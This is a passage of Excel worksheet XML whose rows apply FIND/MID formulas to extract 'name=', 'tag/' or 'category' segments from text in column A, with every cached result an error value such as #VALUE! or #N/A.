    <row r="3071" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3071" t="s">
        <v>2641</v>
      </c>
      <c r="B3071" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3071" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3071" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3071" t="e" cm="1">
        <f t="array" ref="E3071">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3071)), MID($A3071, FIND("name=",$A3071) + 5, LEN($A3071) - FIND("name=",$A3071)),
    ISNUMBER(FIND("tag/",$A3071)), MID($A3071, FIND("tag/",$A3071) + 4, LEN($A3071) - FIND("tag/",$A3071)),
    ISNUMBER(FIND("category",$A3071)), MID($A3071, FIND("category",$A3071) + 9, LEN($A3071) - FIND("category",$A3071)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3071" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3072" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3072" t="s">
        <v>2642</v>
      </c>
      <c r="B3072" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3072" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3072" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3072" t="e" cm="1">
        <f t="array" ref="E3072">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3072)), MID($A3072, FIND("name=",$A3072) + 5, LEN($A3072) - FIND("name=",$A3072)),
    ISNUMBER(FIND("tag/",$A3072)), MID($A3072, FIND("tag/",$A3072) + 4, LEN($A3072) - FIND("tag/",$A3072)),
    ISNUMBER(FIND("category",$A3072)), MID($A3072, FIND("category",$A3072) + 9, LEN($A3072) - FIND("category",$A3072)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3072" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3073" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3073" t="s">
        <v>2643</v>
      </c>
      <c r="B3073" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3073" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3073" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3073" t="e" cm="1">
        <f t="array" ref="E3073">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3073)), MID($A3073, FIND("name=",$A3073) + 5, LEN($A3073) - FIND("name=",$A3073)),
    ISNUMBER(FIND("tag/",$A3073)), MID($A3073, FIND("tag/",$A3073) + 4, LEN($A3073) - FIND("tag/",$A3073)),
    ISNUMBER(FIND("category",$A3073)), MID($A3073, FIND("category",$A3073) + 9, LEN($A3073) - FIND("category",$A3073)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3073" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3074" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3074" t="s">
        <v>2644</v>
      </c>
      <c r="B3074" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3074" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3074" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3074" t="e" cm="1">
        <f t="array" ref="E3074">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3074)), MID($A3074, FIND("name=",$A3074) + 5, LEN($A3074) - FIND("name=",$A3074)),
    ISNUMBER(FIND("tag/",$A3074)), MID($A3074, FIND("tag/",$A3074) + 4, LEN($A3074) - FIND("tag/",$A3074)),
    ISNUMBER(FIND("category",$A3074)), MID($A3074, FIND("category",$A3074) + 9, LEN($A3074) - FIND("category",$A3074)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3074" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3075" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3075" t="s">
        <v>2645</v>
      </c>
      <c r="B3075" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3075" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3075" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3075" t="e" cm="1">
        <f t="array" ref="E3075">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3075)), MID($A3075, FIND("name=",$A3075) + 5, LEN($A3075) - FIND("name=",$A3075)),
    ISNUMBER(FIND("tag/",$A3075)), MID($A3075, FIND("tag/",$A3075) + 4, LEN($A3075) - FIND("tag/",$A3075)),
    ISNUMBER(FIND("category",$A3075)), MID($A3075, FIND("category",$A3075) + 9, LEN($A3075) - FIND("category",$A3075)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3075" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3076" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3076" t="s">
        <v>2646</v>
      </c>
      <c r="B3076" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3076" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3076" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3076" t="e" cm="1">
        <f t="array" ref="E3076">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3076)), MID($A3076, FIND("name=",$A3076) + 5, LEN($A3076) - FIND("name=",$A3076)),
    ISNUMBER(FIND("tag/",$A3076)), MID($A3076, FIND("tag/",$A3076) + 4, LEN($A3076) - FIND("tag/",$A3076)),
    ISNUMBER(FIND("category",$A3076)), MID($A3076, FIND("category",$A3076) + 9, LEN($A3076) - FIND("category",$A3076)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3076" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3077" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3077" t="s">
        <v>2647</v>
      </c>
      <c r="B3077" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3077" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3077" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3077" t="e" cm="1">
        <f t="array" ref="E3077">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3077)), MID($A3077, FIND("name=",$A3077) + 5, LEN($A3077) - FIND("name=",$A3077)),
    ISNUMBER(FIND("tag/",$A3077)), MID($A3077, FIND("tag/",$A3077) + 4, LEN($A3077) - FIND("tag/",$A3077)),
    ISNUMBER(FIND("category",$A3077)), MID($A3077, FIND("category",$A3077) + 9, LEN($A3077) - FIND("category",$A3077)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3077" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3078" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3078" t="s">
        <v>2648</v>
      </c>
      <c r="B3078" t="e">
        <f t="shared" ref="B3078:B3141" si="145">IF(FIND("name=",A3078,1)&gt;0,MID(A3078,FIND("name=",A3078,1)+5,LEN(A3078)-FIND("name=",A3078,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="C3078" t="e">
        <f t="shared" ref="C3078:C3141" si="146">IF(FIND("tag/",$A3078,1)&gt;0,MID($A3078,FIND("tag/",$A3078,1)+4,LEN($A3078)-FIND("tag/",$A3078,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="D3078" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3078" t="e" cm="1">
        <f t="array" ref="E3078">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3078)), MID($A3078, FIND("name=",$A3078) + 5, LEN($A3078) - FIND("name=",$A3078)),
    ISNUMBER(FIND("tag/",$A3078)), MID($A3078, FIND("tag/",$A3078) + 4, LEN($A3078) - FIND("tag/",$A3078)),
    ISNUMBER(FIND("category",$A3078)), MID($A3078, FIND("category",$A3078) + 9, LEN($A3078) - FIND("category",$A3078)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3078" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3079" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3079" t="s">
        <v>2649</v>
      </c>
      <c r="B3079" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3079" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3079" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3079" t="e" cm="1">
        <f t="array" ref="E3079">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3079)), MID($A3079, FIND("name=",$A3079) + 5, LEN($A3079) - FIND("name=",$A3079)),
    ISNUMBER(FIND("tag/",$A3079)), MID($A3079, FIND("tag/",$A3079) + 4, LEN($A3079) - FIND("tag/",$A3079)),
    ISNUMBER(FIND("category",$A3079)), MID($A3079, FIND("category",$A3079) + 9, LEN($A3079) - FIND("category",$A3079)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3079" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3080" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3080" t="s">
        <v>2650</v>
      </c>
      <c r="B3080" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3080" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3080" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3080" t="e" cm="1">
        <f t="array" ref="E3080">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3080)), MID($A3080, FIND("name=",$A3080) + 5, LEN($A3080) - FIND("name=",$A3080)),
    ISNUMBER(FIND("tag/",$A3080)), MID($A3080, FIND("tag/",$A3080) + 4, LEN($A3080) - FIND("tag/",$A3080)),
    ISNUMBER(FIND("category",$A3080)), MID($A3080, FIND("category",$A3080) + 9, LEN($A3080) - FIND("category",$A3080)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3080" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3081" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3081" t="s">
        <v>2651</v>
      </c>
      <c r="B3081" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3081" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3081" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3081" t="e" cm="1">
        <f t="array" ref="E3081">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3081)), MID($A3081, FIND("name=",$A3081) + 5, LEN($A3081) - FIND("name=",$A3081)),
    ISNUMBER(FIND("tag/",$A3081)), MID($A3081, FIND("tag/",$A3081) + 4, LEN($A3081) - FIND("tag/",$A3081)),
    ISNUMBER(FIND("category",$A3081)), MID($A3081, FIND("category",$A3081) + 9, LEN($A3081) - FIND("category",$A3081)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3081" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3082" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3082" t="s">
        <v>2652</v>
      </c>
      <c r="B3082" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3082" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3082" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3082" t="e" cm="1">
        <f t="array" ref="E3082">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3082)), MID($A3082, FIND("name=",$A3082) + 5, LEN($A3082) - FIND("name=",$A3082)),
    ISNUMBER(FIND("tag/",$A3082)), MID($A3082, FIND("tag/",$A3082) + 4, LEN($A3082) - FIND("tag/",$A3082)),
    ISNUMBER(FIND("category",$A3082)), MID($A3082, FIND("category",$A3082) + 9, LEN($A3082) - FIND("category",$A3082)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3082" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3083" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3083" t="s">
        <v>2653</v>
      </c>
      <c r="B3083" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3083" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3083" t="e">
        <f t="shared" ref="D3083:D3146" si="147">IF(FIND("category",$A3083,1)&gt;0,MID($A3083,FIND("category",$A3083,1)+9,LEN($A3083)-FIND("category",$A3083,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="E3083" t="e" cm="1">
        <f t="array" ref="E3083">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3083)), MID($A3083, FIND("name=",$A3083) + 5, LEN($A3083) - FIND("name=",$A3083)),
    ISNUMBER(FIND("tag/",$A3083)), MID($A3083, FIND("tag/",$A3083) + 4, LEN($A3083) - FIND("tag/",$A3083)),
    ISNUMBER(FIND("category",$A3083)), MID($A3083, FIND("category",$A3083) + 9, LEN($A3083) - FIND("category",$A3083)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3083" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3084" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3084" t="s">
        <v>2655</v>
      </c>
      <c r="B3084" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3084" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3084" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3084" t="e" cm="1">
        <f t="array" ref="E3084">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3084)), MID($A3084, FIND("name=",$A3084) + 5, LEN($A3084) - FIND("name=",$A3084)),
    ISNUMBER(FIND("tag/",$A3084)), MID($A3084, FIND("tag/",$A3084) + 4, LEN($A3084) - FIND("tag/",$A3084)),
    ISNUMBER(FIND("category",$A3084)), MID($A3084, FIND("category",$A3084) + 9, LEN($A3084) - FIND("category",$A3084)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3084" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3085" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3085" t="s">
        <v>2656</v>
      </c>
      <c r="B3085" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3085" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3085" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3085" t="e" cm="1">
        <f t="array" ref="E3085">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3085)), MID($A3085, FIND("name=",$A3085) + 5, LEN($A3085) - FIND("name=",$A3085)),
    ISNUMBER(FIND("tag/",$A3085)), MID($A3085, FIND("tag/",$A3085) + 4, LEN($A3085) - FIND("tag/",$A3085)),
    ISNUMBER(FIND("category",$A3085)), MID($A3085, FIND("category",$A3085) + 9, LEN($A3085) - FIND("category",$A3085)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3085" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3086" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3086" t="s">
        <v>2657</v>
      </c>
      <c r="B3086" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3086" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3086" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3086" t="e" cm="1">
        <f t="array" ref="E3086">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3086)), MID($A3086, FIND("name=",$A3086) + 5, LEN($A3086) - FIND("name=",$A3086)),
    ISNUMBER(FIND("tag/",$A3086)), MID($A3086, FIND("tag/",$A3086) + 4, LEN($A3086) - FIND("tag/",$A3086)),
    ISNUMBER(FIND("category",$A3086)), MID($A3086, FIND("category",$A3086) + 9, LEN($A3086) - FIND("category",$A3086)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3086" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3087" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3087" t="s">
        <v>2658</v>
      </c>
      <c r="B3087" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3087" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3087" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3087" t="e" cm="1">
        <f t="array" ref="E3087">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3087)), MID($A3087, FIND("name=",$A3087) + 5, LEN($A3087) - FIND("name=",$A3087)),
    ISNUMBER(FIND("tag/",$A3087)), MID($A3087, FIND("tag/",$A3087) + 4, LEN($A3087) - FIND("tag/",$A3087)),
    ISNUMBER(FIND("category",$A3087)), MID($A3087, FIND("category",$A3087) + 9, LEN($A3087) - FIND("category",$A3087)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3087" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3088" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3088" t="s">
        <v>2659</v>
      </c>
      <c r="B3088" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3088" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3088" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3088" t="e" cm="1">
        <f t="array" ref="E3088">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3088)), MID($A3088, FIND("name=",$A3088) + 5, LEN($A3088) - FIND("name=",$A3088)),
    ISNUMBER(FIND("tag/",$A3088)), MID($A3088, FIND("tag/",$A3088) + 4, LEN($A3088) - FIND("tag/",$A3088)),
    ISNUMBER(FIND("category",$A3088)), MID($A3088, FIND("category",$A3088) + 9, LEN($A3088) - FIND("category",$A3088)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3088" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3089" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3089" t="s">
        <v>2660</v>
      </c>
      <c r="B3089" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3089" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3089" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3089" t="e" cm="1">
        <f t="array" ref="E3089">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3089)), MID($A3089, FIND("name=",$A3089) + 5, LEN($A3089) - FIND("name=",$A3089)),
    ISNUMBER(FIND("tag/",$A3089)), MID($A3089, FIND("tag/",$A3089) + 4, LEN($A3089) - FIND("tag/",$A3089)),
    ISNUMBER(FIND("category",$A3089)), MID($A3089, FIND("category",$A3089) + 9, LEN($A3089) - FIND("category",$A3089)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3089" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3090" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3090" t="s">
        <v>2661</v>
      </c>
      <c r="B3090" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3090" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3090" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3090" t="e" cm="1">
        <f t="array" ref="E3090">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3090)), MID($A3090, FIND("name=",$A3090) + 5, LEN($A3090) - FIND("name=",$A3090)),
    ISNUMBER(FIND("tag/",$A3090)), MID($A3090, FIND("tag/",$A3090) + 4, LEN($A3090) - FIND("tag/",$A3090)),
    ISNUMBER(FIND("category",$A3090)), MID($A3090, FIND("category",$A3090) + 9, LEN($A3090) - FIND("category",$A3090)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3090" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3091" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3091" t="s">
        <v>2662</v>
      </c>
      <c r="B3091" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3091" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3091" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3091" t="e" cm="1">
        <f t="array" ref="E3091">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3091)), MID($A3091, FIND("name=",$A3091) + 5, LEN($A3091) - FIND("name=",$A3091)),
    ISNUMBER(FIND("tag/",$A3091)), MID($A3091, FIND("tag/",$A3091) + 4, LEN($A3091) - FIND("tag/",$A3091)),
    ISNUMBER(FIND("category",$A3091)), MID($A3091, FIND("category",$A3091) + 9, LEN($A3091) - FIND("category",$A3091)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3091" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3092" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3092" t="s">
        <v>2663</v>
      </c>
      <c r="B3092" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3092" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3092" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3092" t="e" cm="1">
        <f t="array" ref="E3092">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3092)), MID($A3092, FIND("name=",$A3092) + 5, LEN($A3092) - FIND("name=",$A3092)),
    ISNUMBER(FIND("tag/",$A3092)), MID($A3092, FIND("tag/",$A3092) + 4, LEN($A3092) - FIND("tag/",$A3092)),
    ISNUMBER(FIND("category",$A3092)), MID($A3092, FIND("category",$A3092) + 9, LEN($A3092) - FIND("category",$A3092)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3092" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3093" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3093" t="s">
        <v>2664</v>
      </c>
      <c r="B3093" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3093" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3093" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3093" t="e" cm="1">
        <f t="array" ref="E3093">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3093)), MID($A3093, FIND("name=",$A3093) + 5, LEN($A3093) - FIND("name=",$A3093)),
    ISNUMBER(FIND("tag/",$A3093)), MID($A3093, FIND("tag/",$A3093) + 4, LEN($A3093) - FIND("tag/",$A3093)),
    ISNUMBER(FIND("category",$A3093)), MID($A3093, FIND("category",$A3093) + 9, LEN($A3093) - FIND("category",$A3093)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3093" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3094" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3094" t="s">
        <v>2665</v>
      </c>
      <c r="B3094" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3094" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3094" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3094" t="e" cm="1">
        <f t="array" ref="E3094">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3094)), MID($A3094, FIND("name=",$A3094) + 5, LEN($A3094) - FIND("name=",$A3094)),
    ISNUMBER(FIND("tag/",$A3094)), MID($A3094, FIND("tag/",$A3094) + 4, LEN($A3094) - FIND("tag/",$A3094)),
    ISNUMBER(FIND("category",$A3094)), MID($A3094, FIND("category",$A3094) + 9, LEN($A3094) - FIND("category",$A3094)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3094" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3095" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3095" t="s">
        <v>2666</v>
      </c>
      <c r="B3095" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3095" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3095" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3095" t="e" cm="1">
        <f t="array" ref="E3095">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3095)), MID($A3095, FIND("name=",$A3095) + 5, LEN($A3095) - FIND("name=",$A3095)),
    ISNUMBER(FIND("tag/",$A3095)), MID($A3095, FIND("tag/",$A3095) + 4, LEN($A3095) - FIND("tag/",$A3095)),
    ISNUMBER(FIND("category",$A3095)), MID($A3095, FIND("category",$A3095) + 9, LEN($A3095) - FIND("category",$A3095)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3095" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3096" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3096" t="s">
        <v>2668</v>
      </c>
      <c r="B3096" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3096" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3096" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3096" t="e" cm="1">
        <f t="array" ref="E3096">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3096)), MID($A3096, FIND("name=",$A3096) + 5, LEN($A3096) - FIND("name=",$A3096)),
    ISNUMBER(FIND("tag/",$A3096)), MID($A3096, FIND("tag/",$A3096) + 4, LEN($A3096) - FIND("tag/",$A3096)),
    ISNUMBER(FIND("category",$A3096)), MID($A3096, FIND("category",$A3096) + 9, LEN($A3096) - FIND("category",$A3096)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3096" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3097" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3097" t="s">
        <v>2670</v>
      </c>
      <c r="B3097" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3097" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3097" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3097" t="e" cm="1">
        <f t="array" ref="E3097">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3097)), MID($A3097, FIND("name=",$A3097) + 5, LEN($A3097) - FIND("name=",$A3097)),
    ISNUMBER(FIND("tag/",$A3097)), MID($A3097, FIND("tag/",$A3097) + 4, LEN($A3097) - FIND("tag/",$A3097)),
    ISNUMBER(FIND("category",$A3097)), MID($A3097, FIND("category",$A3097) + 9, LEN($A3097) - FIND("category",$A3097)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3097" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3098" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3098" t="s">
        <v>2669</v>
      </c>
      <c r="B3098" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3098" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3098" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3098" t="e" cm="1">
        <f t="array" ref="E3098">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3098)), MID($A3098, FIND("name=",$A3098) + 5, LEN($A3098) - FIND("name=",$A3098)),
    ISNUMBER(FIND("tag/",$A3098)), MID($A3098, FIND("tag/",$A3098) + 4, LEN($A3098) - FIND("tag/",$A3098)),
    ISNUMBER(FIND("category",$A3098)), MID($A3098, FIND("category",$A3098) + 9, LEN($A3098) - FIND("category",$A3098)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3098" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3099" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3099" t="s">
        <v>2671</v>
      </c>
      <c r="B3099" t="e">
        <f t="shared" si="145"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3099" t="e">
        <f t="shared" si="146"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3099" t="e">
        <f t="shared" si="147"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3099" t="e" cm="1">
        <f t="array" ref="E3099">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3099)), MID($A3099, FIND("name=",$A3099) + 5, LEN($A3099) - FIND("name=",$A3099)),
    ISNUMBER(FIND("tag/",$A3099)), MID($A3099, FIND("tag/",$A3099) + 4, LEN($A3099) - FIND("tag/",$A3099)),
    ISNUMBER(FIND("category",$A3099)), MID($A3099, FIND("category",$A3099) + 9, LEN($A3099) - FIND("category",$A3099)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3099" t="e">
        <v>#N/A</v>
      </c>
    </row>
